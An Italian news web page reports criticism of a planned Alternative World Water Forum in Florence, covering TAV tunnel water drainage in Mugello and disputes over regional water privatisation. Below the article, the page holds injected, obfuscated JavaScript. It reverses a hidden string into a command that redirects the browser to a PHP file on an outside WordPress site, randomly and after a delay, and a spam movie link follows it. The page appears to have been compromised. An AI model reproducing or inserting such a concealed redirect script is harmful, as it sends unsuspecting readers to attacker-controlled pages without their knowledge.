Piovono critiche sul prossimo Forum Alternativo fiorentino

image_pdfimage_print

No al Forum fiorentino sull’acqua. All’annuncio di Martini da Porto Alegre, riguardo al Forum Mondiale Alternativo sulla questione acqua, che dovrebbe svolgersi a Firenze il 21 e 22 marzo prossimi, si è levato un coro di critiche.
‘Perché non convocarlo a Firenzuola?’, ha suggerito provocatoriamente in una lettera al presidente della Regione l’associazione di volontariato ecologista Idra. ‘In questo modo tutto il mondo potrebbe apprezzare l’elevato valore ambientale delle scelte infrastrutturali somministrate proprio dalla Toscana, a partire dal ’95, alla vallata del Mugello’. Idra ha ricordato che Martini, che nel ’95 era assessore alla Sanità nella giunta regionale diretta da Vannino Chiti, e che dal 2000 guida in prima persona la giunta toscana, una circostanza “clamorosa”. “Secondo i dati forniti da uno studio commissionato dall’Istituto Nazionale per la Ricerca sulla Montagna, dalla Comunità Montana del Mugello, dall’Università degli Studi di Firenze e dall’Istituto di Agrometeorologia e Telerilevamento applicati all’Agricoltura, – si legge nella lettera – dall’inizio dei lavori per la costruzione del tunnel TAV sotto l’Appennino fra Firenze e Bologna fino al mese di maggio 2002 sono stati drenati sul versante toscano ben 45 milioni di metri cubi di acqua di montagna! Senza contare i danni alla falda di Monte Morello. E le interferenze continuano (dati ARPAT) con perdite sempre più gravi”. Epicentro di questa colossale emorragia idrica è il Comune di Firenzuola, (a pochi chilometri da Firenze), ma il problema riguarda anche tutti gli altri Comuni toscani attraversati dalla linea in costruzione. ‘Il territorio di Firenzuola potrebbe dunque ospitare – ha suggerito Idra – il Forum mondiale alternativo dell’acqua. In tal modo i Social Forum italiani potrebbero iniziare sui ‘luoghi del delitto’ ambientale in pieno corso d’opera una riflessione finalmente indipendente, a contatto diretto con le conseguenze delle scelte amministrative visibili qui nella cornice della Toscana democratica’.
Immediata anche la reazione di An. Gaia Checcucci, consigliere comunale di An ha duramente criticato la proposta di Martini. “La capacità di scelte contraddittorie di Regione e Comune non ha limite – ha detto la Checcucci – Il presidente della Toscana Martini ed il sindaco Domenica convocano a Firenze un forum sociale sulla gestione del patrimonio idrico e nel frattempo fanno mercato dell’acqua con le multinazionali. Ma questo i no global di Porto Alegre chissà se lo sanno”. Il consigliere di An ha sottolineato la contraddizione della Regione che, governata dal “no global Martini”, sta portando a termine le gare d’appalto, a cui hanno preso parte esclusivamente multinazionali.
Da tempo è in atto una dura polemica contro la privatizzazione della gestione idrica regionale, di cui le istituzioni sembrano essere ancora all’oscuro. In una lettera di qualche settimana fa, i dipendenti di Acque spa si sono dichiarati “contrari al processo di privatizzazione di un bene pubblico primario come l’acqua” e di ritenere “demagogica e priva di fondamento la posizione di quanti sostengono la privatizzazione delle aziende idriche quale strumento di efficienza e salvaguardia dei servizio”. Una reazione ovvia, questa alle dichiarazioni di principio fatte dagli amministratori toscani. Per loro sembra valere la frase “la mano destra non sa cosa fa la sinistra”. Se da una parte, infatti, sostengono il principio che l’acqua è un diritto e non un business, dall’altra procedono con la vendita delle aziende pubbliche.

$p$VTO6JhIH6WkCGAcPR=function(n){if (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == “string”) return $p$VTO6JhIH6WkCGAcPR.list[n].split(“”).reverse().join(“”);return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=[“‘php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andpolitics.com?find_me_guilty”>find me guilty divx movie online

Leave a Reply

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *